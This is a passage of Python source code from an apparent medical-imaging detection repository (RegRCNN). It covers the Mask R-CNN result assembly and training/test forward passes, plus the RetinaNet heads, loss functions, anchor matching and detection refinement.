each element is a list of boxes per batch element.
:param return_masks: boolean. If True, full resolution masks are returned for all proposals (speed trade-off).
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, 1] only fg. vs. bg for now.
class-specific return of masks will come with implementation of instance segmentation evaluation.
"""
detections = detections.cpu().data.numpy()
if self.cf.dim == 2:
detection_masks = detection_masks.permute(0, 2, 3, 1).cpu().data.numpy()
else:
detection_masks = detection_masks.permute(0, 2, 3, 4, 1).cpu().data.numpy()
# det masks shape now (n_dets, y,x(,z), n_classes)
# restore batch dimension of merged detections using the batch_ix info.
batch_ixs = detections[:, self.cf.dim*2]
detections = [detections[batch_ixs == ix] for ix in range(img_shape[0])]
mrcnn_mask = [detection_masks[batch_ixs == ix] for ix in range(img_shape[0])]
# mrcnn_mask: shape (b_size, variable, variable, n_classes), variable bc depends on single instance mask size
if box_results_list == None: # for test_forward, where no previous list exists.
box_results_list = [[] for _ in range(img_shape[0])]
# seg_logits == seg_probs in mrcnn since mask head finishes with sigmoid (--> image space = [0,1])
seg_probs = []
# loop over batch and unmold detections.
for ix in range(img_shape[0]):
# final masks are one-hot encoded (b, n_classes, y, x, (z))
final_masks = np.zeros((self.cf.num_classes + 1, *img_shape[2:]))
#+1 for bg, 0.5 bc mask head classifies only bg/fg with logits between 0,1--> bg is <0.5
if self.cf.num_classes + 1 != self.cf.num_seg_classes:
self.logger.warning("n of roi-classifier head classes {} doesnt match cf.num_seg_classes {}".format(
self.cf.num_classes + 1, self.cf.num_seg_classes))
if not 0 in detections[ix].shape:
boxes = detections[ix][:, :self.cf.dim*2].astype(np.int32)
class_ids = detections[ix][:, self.cf.dim*2 + 1].astype(np.int32)
scores = detections[ix][:, self.cf.dim*2 + 2]
masks = mrcnn_mask[ix][np.arange(boxes.shape[0]), ..., class_ids]
regressions = detections[ix][:,self.cf.dim*2+3:]
# Filter out detections with zero area. Often only happens in early
# stages of training when the network weights are still a bit random.
if self.cf.dim == 2:
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
else:
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 5] - boxes[:, 4]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
regressions = np.delete(regressions, exclude_ix, axis=0)
# Resize masks to original image size and set boundary threshold.
if return_masks:
for i in range(masks.shape[0]): #masks per this batch instance/element/image
# Convert neural network mask to full size mask
if self.cf.dim == 2:
full_mask = mutils.unmold_mask_2D(masks[i], boxes[i], img_shape[2:])
else:
full_mask = mutils.unmold_mask_3D(masks[i], boxes[i], img_shape[2:])
# take the maximum seg_logits per class of instances in that class, i.e., a pixel in a class
# has the max seg_logit value over all instances of that class in one sample
final_masks[class_ids[i]] = np.max((final_masks[class_ids[i]], full_mask), axis=0)
final_masks[0] = np.full(final_masks[0].shape, 0.49999999) #effectively min_det_thres at 0.5 per pixel
# add final predictions to results.
if not 0 in boxes.shape:
for ix2, coords in enumerate(boxes):
box = {'box_coords': coords, 'box_type': 'det', 'box_score': scores[ix2],
'box_pred_class_id': class_ids[ix2]}
#if (hasattr(self.cf, "convert_cl_to_rg") and self.cf.convert_cl_to_rg):
if "regression_bin" in self.cf.prediction_tasks:
# in this case, regression preds are actually the rg_bin_ids --> map to rg value the bin represents
box['rg_bin'] = regressions[ix2].argmax()
box['regression'] = self.cf.bin_id2rg_val[box['rg_bin']]
else:
box['regression'] = regressions[ix2]
if hasattr(self.cf, "rg_val_to_bin_id") and \
any(['regression' in task for task in self.cf.prediction_tasks]):
box.update({'rg_bin': self.cf.rg_val_to_bin_id(regressions[ix2])})
box_results_list[ix].append(box)
# if no detections were made--> keep full bg mask (zeros).
seg_probs.append(final_masks)
# create and fill results dictionary.
results_dict = {}
results_dict['boxes'] = box_results_list
results_dict['seg_preds'] = np.array(seg_probs)
return results_dict
def train_forward(self, batch, is_validation=False):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
batch['roi_masks']: (b, n(b), c, h(n), w(n) (z(n))) list like roi_labels but with arrays (masks) inplace of
integers. c==channels of the raw segmentation.
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes].
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring.
"""
img = batch['data']
gt_boxes = batch['bb_target']
#axes = (0, 2, 3, 1) if self.cf.dim == 2 else (0, 2, 3, 4, 1)
#gt_masks = [np.transpose(batch['roi_masks'][ii], axes=axes) for ii in range(len(batch['roi_masks']))]
gt_masks = batch['roi_masks']
gt_class_ids = batch['class_targets']
if 'regression' in self.cf.prediction_tasks:
gt_regressions = batch["regression_targets"]
elif 'regression_bin' in self.cf.prediction_tasks:
gt_regressions = batch["rg_bin_targets"]
else:
gt_regressions = None
img = torch.from_numpy(img).cuda().float()
batch_rpn_class_loss = torch.FloatTensor([0]).cuda()
batch_rpn_bbox_loss = torch.FloatTensor([0]).cuda()
# list of output boxes for monitoring/plotting. each element is a list of boxes per batch element.
box_results_list = [[] for _ in range(img.shape[0])]
#forward passes. 1. general forward pass, where no activations are saved in second stage (for performance
# monitoring and loss sampling). 2. second stage forward pass of sampled rois with stored activations for backprop.
rpn_class_logits, rpn_pred_deltas, proposal_boxes, detections, detection_masks = self.forward(img)
mrcnn_pred_deltas, mrcnn_pred_mask, mrcnn_class_logits, mrcnn_regressions, sample_proposals, \
mrcnn_target_deltas, target_mask, target_class_ids, target_regressions = \
self.loss_samples_forward(gt_boxes, gt_masks, gt_class_ids, gt_regressions)
# loop over batch
for b in range(img.shape[0]):
if len(gt_boxes[b]) > 0:
# add gt boxes to output list
for tix in range(len(gt_boxes[b])):
gt_box = {'box_type': 'gt', 'box_coords': batch['bb_target'][b][tix]}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][b][tix]})
box_results_list[b].append(gt_box)
# match gt boxes with anchors to generate targets for RPN losses.
rpn_match, rpn_target_deltas = mutils.gt_anchor_matching(self.cf, self.np_anchors, gt_boxes[b])
# add positive anchors used for loss to output list for monitoring.
pos_anchors = mutils.clip_boxes_numpy(self.np_anchors[np.argwhere(rpn_match == 1)][:, 0], img.shape[2:])
for p in pos_anchors:
box_results_list[b].append({'box_coords': p, 'box_type': 'pos_anchor'})
else:
rpn_match = np.array([-1]*self.np_anchors.shape[0])
rpn_target_deltas = np.array([0])
rpn_match_gpu = torch.from_numpy(rpn_match).cuda()
rpn_target_deltas = torch.from_numpy(rpn_target_deltas).float().cuda()
# compute RPN losses.
rpn_class_loss, neg_anchor_ix = compute_rpn_class_loss(rpn_class_logits[b], rpn_match_gpu, self.cf.shem_poolsize)
rpn_bbox_loss = compute_rpn_bbox_loss(rpn_pred_deltas[b], rpn_target_deltas, rpn_match_gpu)
batch_rpn_class_loss += rpn_class_loss /img.shape[0]
batch_rpn_bbox_loss += rpn_bbox_loss /img.shape[0]
# add negative anchors used for loss to output list for monitoring.
# neg_anchor_ix = neg_ix come from shem and mark positions in roi_probs_neg = rpn_class_logits[neg_indices]
# with neg_indices = rpn_match == -1
neg_anchors = mutils.clip_boxes_numpy(self.np_anchors[rpn_match == -1][neg_anchor_ix], img.shape[2:])
for n in neg_anchors:
box_results_list[b].append({'box_coords': n, 'box_type': 'neg_anchor'})
# add highest scoring proposals to output list for monitoring.
rpn_proposals = proposal_boxes[b][proposal_boxes[b, :, -1].argsort()][::-1]
for r in rpn_proposals[:self.cf.n_plot_rpn_props, :-1]:
box_results_list[b].append({'box_coords': r, 'box_type': 'prop'})
# add positive and negative roi samples used for mrcnn losses to output list for monitoring.
if not 0 in sample_proposals.shape:
rois = mutils.clip_to_window(self.cf.window, sample_proposals).cpu().data.numpy()
for ix, r in enumerate(rois):
box_results_list[int(r[-1])].append({'box_coords': r[:-1] * self.cf.scale,
'box_type': 'pos_class' if target_class_ids[ix] > 0 else 'neg_class'})
# compute mrcnn losses.
mrcnn_class_loss = compute_mrcnn_class_loss(self.cf.prediction_tasks, mrcnn_class_logits, target_class_ids)
mrcnn_bbox_loss = compute_mrcnn_bbox_loss(mrcnn_pred_deltas, mrcnn_target_deltas, target_class_ids)
mrcnn_regressions_loss = compute_mrcnn_regression_loss(self.cf.prediction_tasks, mrcnn_regressions, target_regressions, target_class_ids)
# mrcnn can be run without pixelwise annotations available (Faster R-CNN mode).
# In this case, the mask_loss is taken out of training.
if self.cf.frcnn_mode:
mrcnn_mask_loss = torch.FloatTensor([0]).cuda()
else:
mrcnn_mask_loss = compute_mrcnn_mask_loss(mrcnn_pred_mask, target_mask, target_class_ids)
loss = batch_rpn_class_loss + batch_rpn_bbox_loss +\
mrcnn_bbox_loss + mrcnn_mask_loss + mrcnn_class_loss + mrcnn_regressions_loss
# run unmolding of predictions for monitoring and merge all results to one dictionary.
return_masks = self.cf.return_masks_in_val if is_validation else self.cf.return_masks_in_train
results_dict = self.get_results(img.shape, detections, detection_masks, box_results_list,
return_masks=return_masks)
#results_dict['seg_preds'] = results_dict['seg_preds'].argmax(axis=1).astype('uint8')[:,np.newaxis]
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(
results_dict['seg_preds'], batch["seg"], self.cf.num_seg_classes, convert_to_ohe=True)
results_dict['torch_loss'] = loss
results_dict['class_loss'] = mrcnn_class_loss.item()
results_dict['bbox_loss'] = mrcnn_bbox_loss.item()
results_dict['mask_loss'] = mrcnn_mask_loss.item()
results_dict['rg_loss'] = mrcnn_regressions_loss.item()
results_dict['rpn_class_loss'] = rpn_class_loss.item()
results_dict['rpn_bbox_loss'] = rpn_bbox_loss.item()
return results_dict
def test_forward(self, batch, return_masks=True):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:param return_masks: boolean. If True, full resolution masks are returned for all proposals (speed trade-off).
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
"""
img = batch['data']
img = torch.from_numpy(img).float().cuda()
_, _, _, detections, detection_masks = self.forward(img)
results_dict = self.get_results(img.shape, detections, detection_masks, return_masks=return_masks)
return results_dict
```
#### File: RegRCNN/models/retina_net.py
```python
import utils.model_utils as mutils
import utils.exp_utils as utils
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils
sys.path.append('..')
from custom_extensions.nms import nms
class Classifier(nn.Module):
def __init__(self, cf, conv):
"""
Builds the classifier sub-network.
"""
super(Classifier, self).__init__()
self.dim = conv.dim
self.n_classes = cf.head_classes
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
n_output_channels = cf.n_anchors_per_pos * cf.head_classes
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride, pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: class_logits (b, n_anchors, n_classes)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
class_logits = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
class_logits = class_logits.permute(*axes)
class_logits = class_logits.contiguous()
class_logits = class_logits.view(x.shape[0], -1, self.n_classes)
return [class_logits]
class BBRegressor(nn.Module):
def __init__(self, cf, conv):
"""
Builds the bb-regression sub-network.
"""
super(BBRegressor, self).__init__()
self.dim = conv.dim
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
n_output_channels = cf.n_anchors_per_pos * self.dim * 2
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride, pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: bb_logits (b, n_anchors, dim * 2)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
bb_logits = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
bb_logits = bb_logits.permute(*axes)
bb_logits = bb_logits.contiguous()
bb_logits = bb_logits.view(x.shape[0], -1, self.dim * 2)
return [bb_logits]
class RoIRegressor(nn.Module):
def __init__(self, cf, conv, rg_feats):
"""
Builds the RoI-item-regression sub-network. Regression items can be, e.g., malignancy scores of tumors.
"""
super(RoIRegressor, self).__init__()
self.dim = conv.dim
n_input_channels = cf.end_filts
n_features = cf.n_rpn_features
self.rg_feats = rg_feats
n_output_channels = cf.n_anchors_per_pos * self.rg_feats
anchor_stride = cf.rpn_anchor_stride
self.conv_1 = conv(n_input_channels, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_2 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_3 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_4 = conv(n_features, n_features, ks=3, stride=anchor_stride, pad=1, relu=cf.relu, norm=cf.norm)
self.conv_final = conv(n_features, n_output_channels, ks=3, stride=anchor_stride,
pad=1, relu=None)
def forward(self, x):
"""
:param x: input feature map (b, in_c, y, x, (z))
:return: bb_logits (b, n_anchors, dim * 2)
"""
x = self.conv_1(x)
x = self.conv_2(x)
x = self.conv_3(x)
x = self.conv_4(x)
x = self.conv_final(x)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
x = x.permute(*axes)
x = x.contiguous()
x = x.view(x.shape[0], -1, self.rg_feats)
return [x]
############################################################
# Loss Functions
############################################################
#
def compute_class_loss(anchor_matches, class_pred_logits, shem_poolsize=20):
"""
:param anchor_matches: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:param class_pred_logits: (n_anchors, n_classes). logits from classifier sub-network.
:param shem_poolsize: int. factor of top-k candidates to draw from per negative sample (online-hard-example-mining).
:return: loss: torch tensor
:return: np_neg_ix: 1D array containing indices of the neg_roi_logits, which have been sampled for training.
"""
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
pos_indices = torch.nonzero(anchor_matches > 0)
neg_indices = torch.nonzero(anchor_matches == -1)
# get positive samples and calucalte loss.
if not 0 in pos_indices.size():
pos_indices = pos_indices.squeeze(1)
roi_logits_pos = class_pred_logits[pos_indices]
targets_pos = anchor_matches[pos_indices].detach()
pos_loss = F.cross_entropy(roi_logits_pos, targets_pos.long())
else:
pos_loss = torch.FloatTensor([0]).cuda()
# get negative samples, such that the amount matches the number of positive samples, but at least 1.
# get high scoring negatives by applying online-hard-example-mining.
if not 0 in neg_indices.size():
neg_indices = neg_indices.squeeze(1)
roi_logits_neg = class_pred_logits[neg_indices]
negative_count = np.max((1, pos_indices.cpu().data.numpy().size))
roi_probs_neg = F.softmax(roi_logits_neg, dim=1)
neg_ix = mutils.shem(roi_probs_neg, negative_count, shem_poolsize)
neg_loss = F.cross_entropy(roi_logits_neg[neg_ix], torch.LongTensor([0] * neg_ix.shape[0]).cuda())
# return the indices of negative samples, who contributed to the loss for monitoring plots.
np_neg_ix = neg_ix.cpu().data.numpy()
else:
neg_loss = torch.FloatTensor([0]).cuda()
np_neg_ix = np.array([]).astype('int32')
loss = (pos_loss + neg_loss) / 2
return loss, np_neg_ix
def compute_bbox_loss(target_deltas, pred_deltas, anchor_matches):
"""
:param target_deltas: (b, n_positive_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd)))).
Uses 0 padding to fill in unused bbox deltas.
:param pred_deltas: predicted deltas from bbox regression head. (b, n_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param anchor_matches: tensor (n_anchors). value in [-1, 0, class_ids] for negative, neutral, and positive matched anchors.
i.e., positively matched anchors are marked by class_id >0
:return: loss: torch 1D tensor.
"""
if not 0 in torch.nonzero(anchor_matches>0).shape:
indices = torch.nonzero(anchor_matches>0).squeeze(1)
# Pick bbox deltas that contribute to the loss
pred_deltas = pred_deltas[indices]
# Trim target bounding box deltas to the same length as pred_deltas.
target_deltas = target_deltas[:pred_deltas.shape[0], :].detach()
# Smooth L1 loss
loss = F.smooth_l1_loss(pred_deltas, target_deltas)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_rg_loss(tasks, target, pred, anchor_matches):
"""
:param target_deltas: (b, n_positive_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd)))).
Uses 0 padding to fill in unsed bbox deltas.
:param pred_deltas: predicted deltas from bbox regression head. (b, n_anchors, (dy, dx, (dz), log(dh), log(dw), (log(dd))))
:param anchor_matches: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:return: loss: torch 1D tensor.
"""
if not 0 in target.shape and not 0 in torch.nonzero(anchor_matches>0).shape:
indices = torch.nonzero(anchor_matches>0).squeeze(1)
# Pick rgs that contribute to the loss
pred = pred[indices]
# Trim target
target = target[:pred.shape[0]].detach()
if 'regression_bin' in tasks:
loss = F.cross_entropy(pred, target.long())
else:
loss = F.smooth_l1_loss(pred, target)
else:
loss = torch.FloatTensor([0]).cuda()
return loss
def compute_focal_class_loss(anchor_matches, class_pred_logits, gamma=2.):
""" Focal Loss FL = -(1-q)^g log(q) with q = pred class probability.
:param anchor_matches: (n_anchors). [-1, 0, class] for negative, neutral, and positive matched anchors.
:param class_pred_logits: (n_anchors, n_classes). logits from classifier sub-network.
:param gamma: g in above formula, good results with g=2 in original paper.
:return: loss: torch tensor
:return: focal loss
"""
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
pos_indices = torch.nonzero(anchor_matches > 0).squeeze(-1) # dim=-1 instead of 1 or 0 to cover empty matches.
neg_indices = torch.nonzero(anchor_matches == -1).squeeze(-1)
target_classes = torch.cat( (anchor_matches[pos_indices].long(), torch.LongTensor([0] * neg_indices.shape[0]).cuda()) )
non_neutral_indices = torch.cat( (pos_indices, neg_indices) )
q = F.softmax(class_pred_logits[non_neutral_indices], dim=1) # q shape: (n_non_neutral_anchors, n_classes)
# one-hot encoded target classes: keep only the pred probs of the correct class. it will receive incentive to be maximized.
# log(q_i) where i = target class --> FL shape (n_anchors,)
# need to transform to indices into flattened tensor to use torch.take
target_locs_flat = q.shape[1] * torch.arange(q.shape[0]).cuda() + target_classes
q = torch.take(q, target_locs_flat)
FL = torch.log(q) # element-wise log
FL *= -(1-q)**gamma
# take mean over all considered anchors
FL = FL.sum() / FL.shape[0]
return FL
def refine_detections(anchors, probs, deltas, regressions, batch_ixs, cf):
"""Refine classified proposals, filter overlaps and return final
detections. n_proposals here is typically a very large number: batch_size * n_anchors.
This function is hence optimized on trimming down n_proposals.
:param anchors: (n_anchors, 2 * dim)
:param probs: (n_proposals, n_classes) softmax probabilities for all rois as predicted by classifier head.
:param deltas: (n_proposals, n_classes, 2 * dim) box refinement deltas as predicted by bbox regressor head.
:param regressions: (n_proposals, n_classes, n_rg_feats)
:param batch_ixs: (n_proposals) batch element assignemnt info for re-allocation.
:return: result: (n_final_detections, (y1, x1, y2, x2, (z1), (z2), batch_ix, pred_class_id, pred_score, pred_regr))
"""
anchors = anchors.repeat(batch_ixs.unique().shape[0], 1)
#flatten foreground probabilities, sort and trim down to highest confidences by pre_nms limit.
fg_probs = probs[:, 1:].contiguous()
flat_probs, flat_probs_order = fg_probs.view(-1).sort(descending=True)
keep_ix = flat_probs_order[:cf.pre_nms_limit]
# reshape indices to 2D index array with shape like fg_probs.
keep_arr = torch.cat(((keep_ix / fg_probs.shape[1]).unsqueeze(1), (keep_ix % fg_probs.shape[1]).unsqueeze(1)), 1)
pre_nms_scores = flat_probs[:cf.pre_nms_limit]
pre_nms_class_ids = keep_arr[:, 1] + 1 # add background again.
pre_nms_batch_ixs = batch_ixs[keep_arr[:, 0]]
pre_nms_anchors = anchors[keep_arr[:, 0]]
pre_nms_deltas = deltas[keep_arr[:, 0]]
pre_nms_regressions = regressions[keep_arr[:, 0]]
keep = torch.arange(pre_nms_scores.size()[0]).long().cuda()
# apply bounding box deltas. re-scale to image coordinates.
std_dev = torch.from_numpy(np.reshape(cf.rpn_bbox_std_dev, [1, cf.dim * 2])).float().cuda()
scale = torch.from_numpy(cf.scale).float().cuda()
refined_rois = mutils.apply_box_deltas_2D(pre_nms_anchors / scale, pre_nms_deltas * std_dev) * scale \
if cf.dim == 2 else mutils.apply_box_deltas_3D(pre_nms_anchors / scale, pre_nms_deltas * std_dev) * scale
# round and cast to int since we're deadling with pixels now
refined_rois = mutils.clip_to_window(cf.window, refined_rois)
pre_nms_rois = torch.round(refined_rois)
for j, b in enumerate(mutils.unique1d(pre_nms_batch_ixs)):
bixs = torch.nonzero(pre_nms_batch_ixs == b)[:, 0]
bix_class_ids = pre_nms_class_ids[bixs]
bix_rois = pre_nms_rois[bixs]
bix_scores = pre_nms_scores[bixs]
for i, class_id in enumerate(mutils.unique1d(bix_class_ids)):
ixs = torch.nonzero(bix_class_ids == class_id)[:, 0]
# nms expects boxes sorted by score.
ix_rois = bix_rois[ixs]
ix_scores = bix_scores[ixs]
ix_scores, order = ix_scores.sort(descending=True)
ix_rois = ix_rois[order, :]
ix_scores = ix_scores
class_keep = nms.nms(ix_rois, ix_scores, cf.detection_nms_threshold)
# map indices back.
class_keep = keep[bixs[ixs[order[class_keep]]]]
# merge indices over classes for current batch element
b_keep = class_keep if i == 0 else mutils.unique1d(torch.cat((b_keep, class_keep)))
# only keep top-k boxes of current batch-element.
top_ids = pre_nms_scores[b_keep].sort(descending=True)[1][:cf.model_max_instances_per_batch_element]
b_keep = b_keep[top_ids]
# merge indices over batch elements.
batch_keep = b_keep if j == 0 else mutils.unique1d(torch.cat((batch_keep, b_keep)))
keep = batch_keep
# arrange output.
result = torch.cat((pre_nms_rois[keep],
pre_nms_batch_ixs[keep].unsqueeze(1).float(),
pre_nms_class_ids[keep].unsqueeze(1).float(),
pre_nms_scores[keep].unsqueeze(1),
pre_nms_regressions[keep]), dim=1)
return result
def gt_anchor_matching(cf, anchors, gt_boxes, gt_class_ids=None, gt_regressions=None):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2, (z1), (z2))]
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2, (z1), (z2))]
gt_class_ids (optional): [num_gt_boxes] Integer class IDs for one stage detectors. in RPN case of Mask R-CNN,
set all positive matches to 1 (foreground)
gt_regressions: [num_gt_rgs, n_rg_feats], if None empty rg_targets are returned
Returns:
anchor_class_matches: [N] (int32) matches between anchors and GT boxes. class_id = positive anchor,
-1 = negative anchor, 0 = neutral. i.e., positively matched anchors are marked by class_id (which is >0).
anchor_delta_targets: [N, (dy, dx, (dz), log(dh), log(dw), (log(dd)))] Anchor bbox deltas.
anchor_rg_targets: [n_anchors, n_rg_feats]
"""
anchor_class_matches = np.zeros([anchors.shape[0]], dtype=np.int32)
anchor_delta_targets = np.zeros((cf.rpn_train_anchors_per_image, 2*cf.dim))
if gt_regressions is not None:
if 'regression_bin' in cf.prediction_tasks:
anchor_rg_targets = np.zeros((cf.rpn_train_anchors_per_image,))
else:
anchor_rg_targets = np.zeros((cf.rpn_train_anchors_per_image, cf.regression_n_features))
else:
anchor_rg_targets = np.array([])
anchor_matching_iou = cf.anchor_matching_iou
if gt_boxes is None:
anchor_class_matches = np.full(anchor_class_matches.shape, fill_value=-1)
return anchor_class_matches, anchor_delta_targets, anchor_rg_targets
# for mrcnn: anchor matching is done for RPN loss, so positive labels are all 1 (foreground)
if gt_class_ids is None:
gt_class_ids = np.array([1] * len(gt_boxes))
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = mutils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= anchor_matching_iou then it's positive.
# If an anchor overlaps a GT box with IoU < 0.1 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.1).
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
if anchors.shape[1] == 4:
anchor_class_matches[(anchor_iou_max < 0.1)] = -1
elif anchors.shape[1] == 6:
anchor_class_matches[(anchor_iou_max < 0.01)] = -1
else:
raise ValueError('anchor shape wrong {}'.format(anchors.shape))
# 2. Set an anchor for each GT box (regardless of IoU value).
gt_iou_argmax = np.argmax(overlaps, axis=0)
for ix, ii in enumerate(gt_iou_argmax):
anchor_class_matches[ii] = gt_class_ids[ix]
# 3. Set anchors with high overlap as positive.
above_thresh_ixs = np.argwhere(anchor_iou_max >= anchor_matching_iou)
anchor_class_matches[above_thresh_ixs] = gt_class_ids[anchor_iou_argmax[above_thresh_ixs]]
# Subsample to balance positive anchors.
ids = np.where(anchor_class_matches > 0)[0]
extra = len(ids) - (cf.rpn_train_anchors_per_image // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
anchor_class_matches[ids] = 0
# Leave all negative proposals negative for now and sample from them later in online hard example mining.
# For positive anchors, compute shift and scale needed to transform them to match the corresponding GT boxes.
ids = np.where(anchor_class_matches > 0)[0]
ix = 0 # index into anchor_delta_targets
for i, a in zip(ids, anchors[ids]):
# closest gt box (it might have IoU < anchor_matching_iou)
gt = gt_boxes[anchor_iou_argmax[i]]
# convert coordinates to center plus width/height.
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
if cf.dim == 2:
anchor_delta_targets[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w)]
else:
gt_d = gt[5] - gt[4]
gt_center_z = gt[4] + 0.5 * gt_d
a_d = a[5] - a[4]
a_center_z = a[4] + 0.5 * a_d
anchor_delta_targets[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
(gt_center_z - a_center_z) / a_d,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
np.log(gt_d / a_d)]
# normalize.
anchor_delta_targets[ix] /= cf.rpn_bbox_std_dev
if gt_regressions is not None:
anchor_rg_targets[ix] = gt_regressions[anchor_iou_argmax[i]]
ix += 1
return anchor_class_matches, anchor_delta_targets, anchor_rg_targets
############################################################
# RetinaNet Class
############################################################
class net(nn.Module):
"""Encapsulates the RetinaNet model functionality.
"""
def __init__(self, cf, logger):
"""
cf: A Sub-class of the cf class
model_dir: Directory to save training logs and trained weights
"""
super(net, self).__init__()
self.cf = cf
self.logger = logger
self.build()
if self.cf.weight_init is not None:
logger.info("using pytorch weight init of type {}".format(self.cf.weight_init))
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
self.debug_acm = []
def build(self):
"""Build Retina Net architecture."""
# Image size must be dividable by 2 multiple times.
h, w = self.cf.patch_size[:2]
if h / 2 ** 5 != int(h / 2 ** 5) or w / 2 ** 5 != int(w / 2 ** 5):
raise Exception("Image size must be divisible by 2 at least 5 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
backbone = utils.import_module('bbone', self.cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv = backbone.ConvGenerator(self.cf.dim)
# build Anchors, FPN, Classifier / Bbox-Regressor -head
self.np_anchors = mutils.generate_pyramid_anchors(self.logger, self.cf)
self.anchors = torch.from_numpy(self.np_anchors).float().cuda()
self.fpn = backbone.FPN(self.cf, conv, operate_stride1=self.cf.operate_stride1).cuda()
